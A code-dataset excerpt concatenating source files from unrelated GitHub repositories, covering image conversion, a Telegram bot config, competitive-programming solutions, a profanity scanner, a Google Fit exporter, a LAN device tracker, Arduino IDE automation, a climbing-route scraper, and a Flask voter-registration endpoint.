newPic = path + num + '-v_'+name.split('_')[1] #Generates the Name for v
picv = readPicture(newPic)#reads the new picture with ending V
yuvPic[:,:,2] = picv # packs the u in pos 2
#Right for the Testdata ist: 0y2u1v <<<<<<<<<<<<<
if(wantYUV != 'y'):
yuvPic = hdrorpng(outputextention,yuvPic) # normalize after conversion
rgbPic = YUVtoRGB(yuvPic) # to YUV to RGB conversion Matrix needs to have the Format Y[0] U[1] V[2]
savePic(rgbPic,(str(i)+namePic),outputextention,outputpath)#saves final RGB pic
if(wantYUV == 'y'):
yuvPic = hdrorpng(outputextention,yuvPic) # normalize after conversion
yuvPic = YUVtoRGB(yuvPic)
savePic(yuvPic,(str(i)+namePic),outputextention,outputpath)#saves final YUV pic
i = i + 1
print("--- %s seconds ---" % (time.time() - start_time))
print(str((time.time() - start_time)/60))
print('------------------------- Done --------------------')
# In[ ]:
# In[ ]:
``` |
{
"source": "8bignic8/mqttBitcoinToTelegambott",
"score": 3
} |
#### File: 8bignic8/mqttBitcoinToTelegambott/setConfig.py
```python
import json
import os
import requests
# In[ ]:
def findID(token):
if ':' in token: #checks if a valid Telegram token has been inputed
method = 'getUpdates' #sets the telegram request status
response = requests.post(
url='https://api.telegram.org/bot{0}/{1}'.format(token, method) #reqets the updates with the token
).json()
chatID = (((response['result'][0])['message'])['chat'])['id'] #searches in the dict for the chat message token
print('Your Chat ID is' + str(chatID)) #shows it to the user
return chatID
else:
print('Not the right Token :/')
# In[ ]:
##Input part
print('You need to setup your Telegram bot and add it to a group with you!!, than send a message in the group to initialize the connection')
token = input('Set your BOT TOKEN e.g.: <PASSWORD>:ssf.......wfVg --> ') or 'ERR'
changeValue = input('Set the value, Bitcoin needs to change to get a Telegam message : (number) default 1000 --> ') or '1000'
mqTTBroker = input('Set your mqTTBroker adress e.g.: 192.168.0.42 or localhost --> ') or 'localhost'
mqTTSub = input('Set your mqTTSub for the Bitcoin value e.g.: /home/bitcoin/euro --> ') or '/home/bitcoin/euro'
####Setup config as dict
config = {'myuserid': findID(token),
'token': token,
'changeValue': changeValue,
'mqTTSub':mqTTSub,
'mqTTBroker': mqTTBroker}
# In[ ]:
##Writing JSON with established dict
try:
with open('config.json', 'w', encoding='utf-8') as f: #writing config.json in utf-8
json.dump(config, f)
except:
print('config file write error')
``` |
{
"source": "8Bit1Byte/Codechef-Solutions",
"score": 3
} |
#### File: JUNE21C Competition/MFSS/3.py
```python
from itertools import combinations
from sys import maxsize
class Node(object):
def __init__(self, data):
self.data = data
self.children = []
def add_child(self, obj):
self.children.append(obj)
A = [2, 2, -1, -5, 12, 1]
max = - maxsize
sum_ = list()
sum_.append(A[0])
obj_tree = Node(sum_[0])
result = sum_[0]
for i in range(len(A)-1):
sum_.append(sum[i-1]+A[i])
sum_[i] %= M
int
```
#### File: JUNE21C Competition/OPTSET/1.py
```python
def maxXorSum(n, k):
if k == 1:
return n
res = 1
l = [1]
while res <= n:
res <<= 1
l.append(res)
print(l)
# return res - 1
n, k = map(int, input().split())
maxXorSum(n, k)
```
#### File: JUNE21C Competition/OPTSET/performace.py
```python
from itertools import combinations
n = int(input())
l = [i for i in range(1, n + 1)]
for k in range(1, n+1):
per_ = list(combinations(l, k))
l_u = []
for i in per_:
res = 0
for j in i:
res ^= j
l_u.append((res, i))
print(max(l_u)[0], '|', *max(l_u)[-1])
# =======================================================
# def maxXORInRange(L, R):
# LXR = L ^ R
# msbPos = 0
# while (LXR):
# msbPos += 1
# LXR >>= 1
# maxXOR, two = 0, 1
# while (msbPos):
# maxXOR += two
# two <<= 1
# msbPos -= 1
# return maxXOR
# L, R = 8, 20
# print(maxXORInRange(L, R))
# from itertools import combinations
# n = int(input())
# l = [i for i in range(1, n + 1)]
# for k in range(1, n+1):
# per_ = list(combinations(l, k))
# l_u = []
# for i in per_:
# res = 0
# for j in i:
# res ^= j
# l_u.append((res, i))
# print(max(l_u)[0], '|', *max(l_u)[-1])
```
#### File: Codechef-Solutions/LTIME96C Competition/HOOPS.py
```python
import os.path
from math import gcd, floor, ceil
from collections import *
import sys
mod = 1000000007
INF = float('inf')
def st(): return list(sys.stdin.readline().strip())
def li(): return list(map(int, sys.stdin.readline().split()))
def ls(): return list(sys.stdin.readline().split())
def mp(): return map(int, sys.stdin.readline().split())
def inp(): return int(sys.stdin.readline())
def pr(n): return sys.stdout.write(str(n)+"\n")
def prl(n): return sys.stdout.write(str(n)+" ")
# for standard i/o
if os.path.exists('input.txt'):
sys.stdin = open('input.txt', 'r')
sys.stdout = open('output.txt', 'w')
def solve(n):
print(n//2+1)
if __name__ == '__main__':
t = inp()
for _ in range(t):
n = inp()
solve(n)
```
#### File: Codechef-Solutions/Practice(Beginner)/FLOW004.py
```python
from sys import stdin
def main(t):
curInx = t
while curInx:
n = stdin.readline()
curInx -= 1
print(int(n[0])+int(n[-2]))
if __name__ == '__main__':
t = int(stdin.readline())
main(t)
```
#### File: Codechef-Solutions/Practice(Beginner)/FLOW015.py
```python
from sys import stdin, stdout
import datetime
def main(t):
for _ in range(t):
stdout.write(f'{datetime.datetime(int(stdin.readline()),1,1).strftime("%A").lower()}'+'\n')
if __name__ == '__main__':
t = int(stdin.readline())
main(t)
```
#### File: Codechef-Solutions/YTPP001 Competition/PECEX1A.py
```python
def solve(m: list):
m.sort()
return m[2]
if __name__ == '__main__':
n = int(input())
for _ in range(n):
m = list(map(int, input().split()))
print(solve(m))
```
#### File: Codechef-Solutions/YTPP001 Competition/PRPRME.py
```python
def primeNum(m):
from math import sqrt
if m == 0 or m == 1: # O(1) constant case time (base case)
return False
if m == 2 or m == 3: # O(1) constant case time (base case)
return True
if m%2 == 0 or m%3 == 0: # O(1)
return False
for i in range(5, int(sqrt(m))+1):
if m%i == 0 or m%(i+2) == 0:
return False
return True
def solve(m):
i = 0
j = 1
while i < m:
if primeNum(j):
print(j, end=' ')
i += 1
j += 1
if __name__ == '__main__':
n = int(input())
solve(n)
```
#### File: Codechef-Solutions/YTPP001 Competition/SECLAR.py
```python
def solve(n: list):
n_ = n
max_ = max(n_)
n_.remove(max_)
return max(n_)
if __name__ == '__main__':
a = int(input())
b = int(input())
c = int(input())
print(solve([a, b, c]))
``` |
{
"source": "8bitape/AtlasExtruder",
"score": 3
} |
#### File: 8bitape/AtlasExtruder/atlas_extrude.py
```python
import json
from PIL import Image
def extrude(image, sprites, padding):
im = Image.open(image)
pixels = im.load()
atlas = json.load(open(sprites, "r"))
for frame in atlas["frames"]:
x = atlas["frames"][frame]["frame"]["x"]
y = atlas["frames"][frame]["frame"]["y"]
width = atlas["frames"][frame]["sourceSize"]["w"]
height = atlas["frames"][frame]["sourceSize"]["h"]
for i in range(padding):
for j in range (padding):
pixels[x - (i + 1), y - (j + 1)] = pixels[x, y]
pixels[x - (i + 1), y + (height + j)] = pixels[x, y + height - 1]
pixels[x + (width + i), y - (j + 1)] = pixels[x + width - 1, y]
pixels[x + (width + i), y + (height + j)] = pixels[x + width - 1, y + height - 1]
for y in range(y, y + height):
for i in range(padding):
pixels[x - (i + 1), y] = pixels[x, y]
pixels[x + (width + i), y] = pixels[x + width - 1, y]
for x in range(x, x + width):
for i in range(padding):
pixels[x, y + (i + 1)] = pixels[x, y]
pixels[x, y - (height + i)] = pixels[x, y - height + 1]
im.save(image)
``` |
{
"source": "8bitbuddhist/swearscan",
"score": 3
} |
#### File: 8bitbuddhist/swearscan/swearscan.py
```python
import os
from sourcefile import SourceFile
import argparse
def main(url):
files = []
for root, directories, filenames in os.walk(url):
for filename in filenames:
file = SourceFile(os.path.join(root, filename))
files.append(file)
try:
print("Parsing " + file.fullpath)
file.parse()
if len(file.profanewords) > 0:
for index, word in enumerate(file.profanewords):
print("Line " + str(file.profanelines[index] + 1) + ": " + word)
print("Found " + str(len(file.profanewords)) + " words for a score of " + str(file.profanityscore))
print()
except Exception as ex:
print("Failed to parse file: ", ex)
# Calculate and display statistics
mostprofanefile = max(files, key=lambda curfile: len(curfile.profanewords))
from collections import Counter
mostprofanewords = []
for file in files:
word = file.favoriteprofaneword()
if word is not None:
mostprofanewords.append(word)
if len(mostprofanewords) > 0:
profanewords = Counter(mostprofanewords)
mostcommonprofaneword = [elem[0] for elem in profanewords.most_common(1)][0]
else:
mostcommonprofaneword = "N/A"
print()
print("Total files scanned: " + str(len(files)))
print("Words found: "
+ str(sum(file.profanewordcount[1] for file in files)) + " Mild, "
+ str(sum(file.profanewordcount[2] for file in files)) + " Medium, "
+ str(sum(file.profanewordcount[3] for file in files)) + " Strong, "
+ str(sum(file.profanewordcount[4] for file in files)) + " Very Strong")
totalprofanityscore = sum(file.profanityscore for file in files)
if totalprofanityscore > 0 :
print("Most profane file: " + str(mostprofanefile.fullpath) + " with " + str(len(mostprofanefile.profanewords))
+ " words for a score of " + str(mostprofanefile.profanityscore))
print("Most common word: " + mostcommonprofaneword)
print("Total score: " + str(totalprofanityscore))
parser = argparse.ArgumentParser(description='Scan a directory for profanity.')
parser.add_argument('dir', type=str, nargs=1, help='directory to scan')
args = parser.parse_args()
main(args.dir[0])
``` |
{
"source": "8bitgentleman/fitexport",
"score": 2
} |
#### File: 8bitgentleman/fitexport/main.py
```python
from __future__ import print_function
import json
import time
from os import path, makedirs
import pickle
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
import pprint
pp = pprint.PrettyPrinter(indent=4)
# If modifying these scopes, delete the file token.pickle.
SCOPES = ['https://www.googleapis.com/auth/fitness.activity.read']
# DATA SOURCE
DATA_SOURCE = "derived:com.google.step_count.delta:com.google.android.gms:estimated_steps"
START_TIME = "1051700038292387000-"
# test time
# START_TIME = "1577854800000000000-"
def saveJSON(name, data):
dir_name = path.dirname(path.abspath(__file__))
file_name = "exports/" + name + "-" + str(int(time.time())) + ".json"
full_name = path.join(dir_name, file_name)
with open(full_name, 'w') as outfile:
json.dump(data, outfile, indent=4, sort_keys=True)
def main():
"""Shows basic usage of the FIT API.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=54547)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('fitness', 'v1', credentials=creds)
# Call the Fitness API
DATA_SET = START_TIME + str(time.time_ns())
data_sources = service.users().dataSources(). \
list(userId='me'). \
execute()
saveJSON("dataSources", data_sources)
# create subdir for datastreams
timestamp = str(time.time_ns())
makedirs(f"exports/segments/{timestamp}")
data_list = []
for index, s in enumerate(data_sources['dataSource']):
try:
dataset = service.users().dataSources(). \
datasets(). \
get(userId='me', dataSourceId=s['dataStreamId'], datasetId=DATA_SET). \
execute()
# saveJSON("segments/" + s['dataStreamId'], dataset)
saveJSON( f"segments/{timestamp}/{s['dataStreamId']}", dataset)
# data_list.append(dataset)
except Exception as e:
print("Error at " + s['dataStreamId'])
print(e)
# saveJSON("dataset", data_list)
if __name__ == '__main__':
main()
``` |
{
"source": "8bitidea/omac-solved-lessons-",
"score": 4
} |
#### File: omac-solved-lessons-/code/L14-9.py
```python
def product_list(list_of_numbers):
r = 1
x= 0
while x < len(list_of_numbers):
r = r * list_of_numbers[x]
x+=1
return r
print product_list([9])
#>>> 9
print product_list([1,2,3,4])
#>>> 24
print product_list([])
#>>> 1
```
#### File: omac-solved-lessons-/code/L18-5.py
```python
import turtle
def draw_square():
w = turtle.Screen()
w.bgcolor("green")
t = turtle.Turtle()
t.shape("turtle")
t.speed(1)
t.color("blue")
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
t.right(90)
t.forward(100)
# t.right(90)
w.exitonclick()
draw_square()
``` |
{
"source": "8BitJosh/WhosHome",
"score": 2
} |
#### File: WhosHome/main/main.py
```python
from aiohttp import web
import socketio
import asyncio
import subprocess
import json
from datetime import datetime
import os
from xmljson import badgerfish as bf
from xml.etree.ElementTree import fromstring
socketio = socketio.AsyncServer()
app = web.Application()
socketio.attach(app)
loop = asyncio.get_event_loop()
ipRange = '192.168.0.0/24'
scaninterval = 300
Users = {}
if not os.path.isfile('Users.json'):
with open('Users.json', 'w') as file:
json.dump({}, file)
with open('Users.json', 'r') as file:
Users = json.load(file)
async def index(request):
return web.FileResponse('./main/templates/index.html')
@socketio.on('getTable', namespace='/main')
async def whoshome(sid):
global Users
await socketio.emit('table', Users, namespace='/main', room=sid)
@socketio.on('addUser', namespace='/main')
async def addUser(sid, data):
global Users
if data['mac'] not in Users:
return 0
Users[data['mac']]['name'] = data['name']
print(data)
saveFile()
await socketio.emit('table', Users, namespace='/main')
def saveFile():
global Users
with open('Users.json', 'w') as file:
print('Saving file - ' + datetime.now().strftime("[%d/%m/%y %H:%M:%S]"))
json.dump(Users, file)
async def updateNmap():
global Users
global scaninterval
await asyncio.sleep(20)
while True:
p = subprocess.Popen(['sudo','nmap','-oX','-','-sn',ipRange],
bufsize=10000,stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(temp_xml,temp_err) = p.communicate()
temp_json=bf.data(fromstring(temp_xml))
tempUsers = Users
timeNow = datetime.now().strftime("[%d/%m/%y %H:%M:%S]")
print('Scan run at {} in {} seconds, hosts up: {}'.format(timeNow,
temp_json['nmaprun']['runstats']['finished']['@elapsed'],
temp_json['nmaprun']['runstats']['hosts']['@up']), flush=True)
for key in tempUsers:
tempUsers[key]['online'] = 0
for y in range(0,temp_json['nmaprun']['runstats']['hosts']['@up']):
mac = "none"
ip = "none"
ipv6 = "none"
if len(temp_json['nmaprun']['host'][y]['hostnames']) > 0:
hostname = temp_json['nmaprun']['host'][y]['hostnames']['hostname']['@name']
else:
hostname = "none"
host_state = temp_json['nmaprun']['host'][y]['status']['@state']
if type(temp_json['nmaprun']['host'][y]['address']) == list:
for x in range(0,len(temp_json['nmaprun']['host'][y]['address'])):
temp_addr = temp_json['nmaprun']['host'][y]['address'][x]['@addr']
temp_addr_type = temp_json['nmaprun']['host'][y]['address'][x]['@addrtype']
if temp_addr_type == "ipv4":
ip = temp_addr
elif temp_addr_type == "ipv6":
ipv6 = temp_addr
elif temp_addr_type == "mac":
mac = temp_addr
else:
continue
if mac not in tempUsers:
tempUsers[mac] = {}
if 'name' not in tempUsers[mac]:
tempUsers[mac]['name'] = 'undefined'
tempUsers[mac]['upTime'] = 0
tempUsers[mac]['ip'] = ip
tempUsers[mac]['last'] = timeNow
tempUsers[mac]['online'] = 1
tempUsers[mac]['upTime'] += scaninterval
Users = tempUsers
await socketio.emit('table', Users, namespace='/main')
saveFile()
await asyncio.sleep(scaninterval)
loop.create_task(updateNmap())
app.router.add_get('/', index)
app.router.add_static('/static/', path=str('./main/static'), name='static')
web.run_app(app, port=8080)
``` |
{
"source": "8bitkitkat/xx",
"score": 3
} |
#### File: 8bitkitkat/xx/example_premake.py
```python
BINARY = "HelloWorld"
import os
if not os.path.exists("xx.py"):
print("downloading xx.py ... ", end="", flush=True)
import requests
url = "https://raw.githubusercontent.com/8bitkitkat/xx/master/xx.py"
r = requests.get(url, allow_redirects=True)
open("xx.py", "wb").write(r.content)
print("done")
import xx as x
Action = x.Action
cleanFiles = [
"build",
"*.make",
"Makefile",
]
@Action("clean")
def clean():
x.remove_paths(cleanFiles)
@Action("setup", "setup project for building")
def setup():
x.osrun("premake5 gmake2")
@Action("build|b")
def build():
setup()
x.osrun("make")
@Action("run|r")
def run():
build()
print()
x.osrun(f"./build/Debug/{BINARY}\n")
if __name__ == '__main__':
x.main()
``` |
{
"source": "8BitMixtape/NeoBlock",
"score": 2
} |
#### File: NeoBlock/ardublocklyserver/actions.py
```python
from __future__ import unicode_literals, absolute_import
import subprocess
import locale
import time
import json
import sys
import os
try:
# 2.x name
import Tkinter
import urlparse
import tkFileDialog
except ImportError:
# 3.x name
import tkinter as Tkinter
import urllib.parse as urlparse
import tkinter.filedialog as tkFileDialog
from ardublocklyserver.compilersettings import ServerCompilerSettings
from ardublocklyserver.sketchcreator import SketchCreator
import ardublocklyserver.six.six.moves as six_moves
from ardublocklyserver.six import six
import ardublocklyserver.gui as gui
#
# Sketch loading to Arduino functions
#
def load_arduino_cli(sketch_path=None):
"""
Launches a subprocess to invoke the Arduino IDE command line to open,
verify or upload an sketch, the location of which is indicated in the input
parameter.
:param sketch_path: Path to the sketch to load into the Arduino IDE.
:return: A tuple with the following data (success, conclusion, out, error,
exit_code)
"""
success = True
conclusion = error = out = exit_code = ''
# Input sanitation and output defaults
if not sketch_path:
sketch_path = create_sketch_default()
else:
if not os.path.isfile(sketch_path):
conclusion = error = 'Provided sketch path is not a valid file: %s'\
% sketch_path
success = False
return success, conclusion, out, error, exit_code
settings = ServerCompilerSettings()
# Check if CLI flags have been set
if not settings.compiler_dir:
success = False
conclusion = 'Unable to find Arduino IDE'
error = 'The compiler directory has not been set.\n' + \
'Please set it in the Settings.'
else:
if not settings.load_ide_option:
success = False
conclusion = 'What should we do with the Sketch?'
error = 'The launch IDE option has not been set.\n' + \
'Please select an IDE option in the Settings.'
elif settings.load_ide_option == 'upload':
if not settings.get_serial_port_flag():
success = False
conclusion = 'Serial Port unavailable'
error = 'The Serial Port does not exist.\n' + \
'Please check if the Arduino is correctly ' + \
'connected to the PC and select the Serial Port in ' +\
'the Settings.'
if not settings.get_arduino_board_flag():
success = False
conclusion = 'Unknown Arduino Board'
error = 'The Arduino Board has not been set.\n' + \
'Please select the appropriate Arduino Board from ' + \
'the settings.'
if success:
# Concatenates the CLI command and execute if the flags are valid
cli_command = [settings.compiler_dir]
if settings.load_ide_option == 'upload':
print('\nUploading sketch to Arduino...')
# This success conclusion message gets overwritten in case of error
conclusion = 'Successfully Uploaded Sketch'
cli_command.append('--upload')
cli_command.append('--port')
cli_command.append(settings.get_serial_port_flag())
cli_command.append('--board')
cli_command.append(settings.get_arduino_board_flag())
elif settings.load_ide_option == 'verify':
print('\nVerifying the sketch...')
# This success conclusion message gets overwritten in case of error
conclusion = 'Successfully Verified Sketch'
cli_command.append('--verify')
elif settings.load_ide_option == 'open':
print('\nOpening the sketch in the Arduino IDE...')
conclusion = 'Sketch opened in IDE'
out = 'The sketch should be loaded in the Arduino IDE.'
cli_command.append("%s" % sketch_path)
print('CLI command: %s' % ' '.join(cli_command))
# Python 2 needs the input to subprocess.Popen to be in system encoding
if sys.version_info[0] < 3:
for item in six_moves.range(len(cli_command)):
cli_command[item] = cli_command[item].encode(
locale.getpreferredencoding())
if settings.load_ide_option == 'open':
# Open IDE in a subprocess without capturing outputs
subprocess.Popen(cli_command, shell=False)
# Wait a few seconds to allow IDE to open before sending back data
time.sleep(5)
else:
# Launch the Arduino CLI in a subprocess and capture output data
process = subprocess.Popen(
cli_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False)
out, error = process.communicate()
out = six.u(out)
error = six.u(error)
exit_code = process.returncode
print('Arduino output:\n%s' % out)
print('Arduino Error output:\n%s' % error)
print('Arduino Exit code: %s' % exit_code)
# For some reason Arduino CLI can return 256 on success
if (process.returncode != 0) and (process.returncode != 256):
success = False
if exit_code == 1:
conclusion = 'Build or Upload failed'
elif exit_code == 2:
conclusion = 'Sketch not found'
elif exit_code == 3:
conclusion = 'Invalid command line argument'
elif exit_code == 4:
conclusion =\
'Preference passed to "get-pref" flag does not exist'
else:
conclusion = 'Unexpected exit error code: %s' % exit_code
return success, conclusion, out, error, exit_code
def create_sketch_default():
settings = ServerCompilerSettings()
return SketchCreator().create_sketch(
settings.sketch_dir, sketch_name=settings.sketch_name)
def create_sketch_from_string(sketch_code):
settings = ServerCompilerSettings()
return SketchCreator().create_sketch(
settings.sketch_dir, sketch_name=settings.sketch_name,
sketch_code=sketch_code)
#
# Compiler Settings
#
def set_compiler_path():
"""
Opens the file browser to select a file. Saves this file path into
ServerCompilerSettings and if the file path is different to that stored
already it triggers the new data to be saved into the settings file.
"""
new_path = gui.browse_file_dialog()
if new_path != '':
ServerCompilerSettings().compiler_dir = new_path
return get_compiler_path()
def get_compiler_path():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_compiler",
"element" : "text_input",
"display_text" : "Compiler Directory"}
"""
compiler_directory = ServerCompilerSettings().compiler_dir
if not compiler_directory:
compiler_directory = 'Please select a valid Arduino compiler directory'
json_data = {'setting_type': 'compiler',
'element': 'text_input',
'display_text': compiler_directory}
return json.dumps(json_data)
#
# Sketch settings
#
def set_sketch_path():
"""
Opens the directory browser to select a file. Saves this directory into
ServerCompilerSettings and if the directory is different to that stored
already it triggers the new data to be saved into the settings file.
"""
new_directory = gui.browse_dir_dialog()
if new_directory != '':
ServerCompilerSettings().sketch_dir = new_directory
return get_sketch_path()
def get_sketch_path():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_sketch",
"element" : "text_input",
"display_text" : "Sketch Directory"}
"""
sketch_directory = ServerCompilerSettings().sketch_dir
if not sketch_directory:
sketch_directory = 'Please select a valid Sketch directory.'
json_data = {'setting_type': 'compiler',
'element': 'text_input',
'display_text': sketch_directory}
return json.dumps(json_data)
#
# Arduino Board settings
#
def set_arduino_board(new_value):
ServerCompilerSettings().arduino_board = new_value
return get_arduino_boards()
def get_arduino_boards():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_board",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
#TODO: Check for None, however won't happen because static dict in settings
boards = ServerCompilerSettings().get_arduino_board_types()
for item in boards:
json_data['options'].append(
{'value': item, 'display_text': item})
json_data.update({'selected': ServerCompilerSettings().arduino_board})
return json.dumps(json_data)
#
# Serial Port settings
#
def set_serial_port(new_value):
ServerCompilerSettings().serial_port = new_value
return get_serial_ports()
def get_serial_ports():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_serial",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
ports = ServerCompilerSettings().get_serial_ports()
if not ports:
json_data['options'].append({
'value': 'no_ports',
'display_text': 'There are no available Serial Ports'})
json_data.update({'selected': 'no_ports'})
else:
for key in ports:
json_data['options'].append(
{'value': key, 'display_text': ports[key]})
json_data.update({'selected': ServerCompilerSettings().serial_port})
return json.dumps(json_data)
#
# Load IDE settings
#
def set_load_ide_only(new_value):
ServerCompilerSettings().load_ide_option = new_value
return get_load_ide_only()
def get_load_ide_only():
"""
Creates a JSON string to return to the page with the following format:
{"response_type" : "settings_ide",
"element" : "dropdown",
"options" : [
{"value" : "XXX", "text" : "XXX"},
...]
"selected": "selected key"}
"""
json_data = \
{'setting_type': 'ide',
'element': 'dropdown',
'options': []}
#TODO: Check for None, however won't happen because static dict in settings
ide_options = ServerCompilerSettings().get_load_ide_options()
for key in ide_options:
json_data['options'].append(
{'value': key, 'display_text': ide_options[key]})
json_data.update({'selected': ServerCompilerSettings().load_ide_option})
return json.dumps(json_data)
``` |
{
"source": "8bit-number/coursework-project",
"score": 3
} |
#### File: coursework-project/modules/main_parser.py
```python
from bs4 import BeautifulSoup
import requests
import re
import csv
from modules.exceptions import ParserException
def page_increment(num):
num += 1
return num
def url_processor(page):
"""
Function for sending requests to certain url to get the web-page contents
# >>> print(type(url_processor(1)))
# <class 'bytes'>
:param page: int - number of page in query parameter
:return: bytes - web-page contents
"""
address = "https://www.thecrag.com/climbing/world/routes"
query = dict(sortby="popularity,desc", page=page)
response = requests.get(address, params=query)
return response.content
def format_title(bs_obj):
"""
Function for getting the ascent title and its path in the readable
representation
:param bs_obj: bs4 - the table, that contains only the needed html tags
:return: list
"""
if bs_obj:
splitted = bs_obj["title"].split("›")[1:]
for el in range(len(splitted)):
splitted[el] = splitted[el].replace("\xa0", '')
splitted[el] = splitted[el].strip()
return splitted + [bs_obj.text]
else:
return None
def get_lat_lon(bs_obj):
"""
Function for getting latitude and longitude of each ascent and mountain
:param bs_obj: Beautiful_soup object
:return: list - list of coords
"""
full_url = "https://www.thecrag.com" + bs_obj["href"]
try:
resp = requests.get(full_url)
bs_obj = BeautifulSoup(resp.content, "lxml")
rez = bs_obj.find("dl",
{"class": "areaInfo"}).text.strip()
if "Lat/Long" not in rez:
return None
else:
splited = rez.split()[1:]
return ''.join(splited)
except:
print(full_url)
return "Unknown coords"
def get_ascent_type(bs_obj):
"""
gets the ascent style: Boulder, Mixed, Trad
it will be useful for future difficulties classification and their representation
:param bs_obj: BeautifulSoup object
:return: str
"""
rez = bs_obj.find("span", {"class": re.compile("tags .+")})
if rez:
return rez.text
return "Unknown"
def get_ascent_difficulty(bs_obj):
"""
gets the ascent difficulty: Considering the fact, that some countries have
their own grading, this data is important
:param bs_obj: BeautifulSoup object
:return: str
"""
rez = bs_obj.find('span',
{"class": re.compile("pull-right gb\d+")})
category = bs_obj.find("span")["class"][1]
if rez:
return rez.text, category
return "Unknown", "Unknown"
def main_parser(html):
"""
function to process all needed data call other minor functions
:param html: html contents of the web-site
:return: None
"""
soup = BeautifulSoup(html, 'lxml')
table = soup.find_all('tr')
if len(table) == 1:
raise ParserException(
"The url contains an empty page.")
for row in table:
bs_obj = row.find("a", {"title": re.compile(".+")})
title = format_title(bs_obj)
if title:
ascent_type = get_ascent_type(row)
ascent_difficulty = get_ascent_difficulty(row)
long_lat = get_lat_lon(bs_obj)
write_to_file(title, ascent_type, ascent_difficulty[0],
ascent_difficulty[1], long_lat)
def write_to_file(title, style, difficulty, category, location):
"""
write all the data to the .csv file
:param title: list
:param style: str
:param difficulty: str
:param category: str
:param location: str
:return:
"""
with open("data.csv", "a") as csv_file:
writer = csv.writer(csv_file, delimiter=',')
if location:
writer.writerow(
title + [style] + [difficulty] + [category] + [
location])
if __name__ == '__main__':
from_page = 1
to_page = 5900
for page in range(from_page, to_page + 1):
content = url_processor(page)
try:
rows = main_parser(content)
except ParserException:
with open("log.txt", "a") as f:
f.write(content.url)
```
#### File: coursework-project/tests/csv_to_db_test.py
```python
import unittest
from modules.csv_to_db import DataBase
class MyTestCase(unittest.TestCase):
def setUp(self):
self.db = DataBase("../data/first9000.db")
self.austria = self.db.execute_selection_by_country("Austria")
self.france = self.db.execute_selection_by_country("France")
def test_locations_table(self):
location_1 = "Europe, Austria, Ost, Industrieviertel, Wienerwald(IV), Thalhofergrat, ObereOstwand, ★★ Osterhasi"
location_2 = "Europe, France, Île-de-France, Fontainebleau, Cuvier, BasCuvier, RedcircuitTD+(nº6), ★★★ La Marie Rose"
self.assertEqual(self.austria[0].location, location_1)
self.assertEqual(self.france[0].location, location_2)
def test_difficulty(self):
category_1 = "Intermediate"
category_2 = "Experienced"
self.assertEqual(self.austria[0].category, category_1)
self.assertEqual(self.france[0].category, category_2)
def test_style(self):
style_1 = "Sport"
style_2 = "Boulder"
self.assertEqual(self.austria[0].style, style_1)
self.assertEqual(self.france[0].style, style_2)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "8BookIt8/Genetic-Algorithm",
"score": 3
} |
#### File: 8BookIt8/Genetic-Algorithm/BIfood.py
```python
import pygame
import yaml
import math
from random import randrange
with open('settings.yaml') as file:
settings = yaml.load(file, yaml.FullLoader)
center = (451, 451)
spawn_distance = settings['basic_settings']['max_distance_food']
class BIFood(pygame.sprite.Sprite):
# 기본 설정
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("images/food.png").convert_alpha()
self.x = center[0]
self.y = center[1]
self.rect = self.image.get_rect()
self.rect.left = 0
self.rect.top = 0
self.size = 5
self.init()
# 중앙으로부터의 거리 계산
def distanceFromCenter(self, pos):
'''
필드 중앙으로부터의 거리 계산
Args:
pos (tuple): 대상 좌표
Returns:
dist (float): 필드 중앙으로부터 pos까지의 거리
'''
dist = ((center[0] - pos[0]) ** 2) + ((center[1] - pos[1]) ** 2)
dist = math.sqrt(dist)
return dist
# 판정 설정
def setRect(self):
'''
rect 설정
'''
self.rect.left = self.x - 5
self.rect.top = self.y - 5
# 위치 설정
def init(self):
'''
개체 위치 설정
'''
while True:
x = randrange(spawn_distance * -1, spawn_distance + 1)
y = randrange(spawn_distance * -1, spawn_distance + 1)
if (self.distanceFromCenter((self.x + x, self.y + y)) <= spawn_distance):
self.x += x
self.y += y
self.setRect()
break
``` |
{
"source": "8by8-org/usvotes",
"score": 2
} |
#### File: app/main/starter_views.py
```python
from __future__ import print_function
from app.main import main
from flask import g, url_for, render_template, request, redirect, session as http_session, abort, current_app, flash, jsonify, make_response
from app.main.forms import *
from app.services import SessionManager
from app.services.steps import Step_0
from app.main.helpers import guess_locale
import json
from app.services import FormFillerService
from app.services.usps_api import USPS_API
from app.services.email_service import EmailService
from flask_cors import cross_origin
from datetime import datetime, timedelta
from apscheduler.schedulers.background import BackgroundScheduler
#from google.cloud import scheduler_v1
import os
import tracemalloc
tracemalloc.start(10)
# backend api endpoint for checking voter registration status
@main.route('/registered', strict_slashes=False, methods=["POST"])
@cross_origin(origin='*')
def registered():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
otherErrors = []
if 'state' not in requestData:
missingParams.append('state')
elif len(requestData.get('state')) != 2:
otherErrors.append('state must be 2 letter abbreviation')
if 'city' not in requestData:
missingParams.append('city')
if 'street' not in requestData:
missingParams.append('street')
if 'name_first' not in requestData:
missingParams.append('name_first')
if 'name_last' not in requestData:
missingParams.append('name_last')
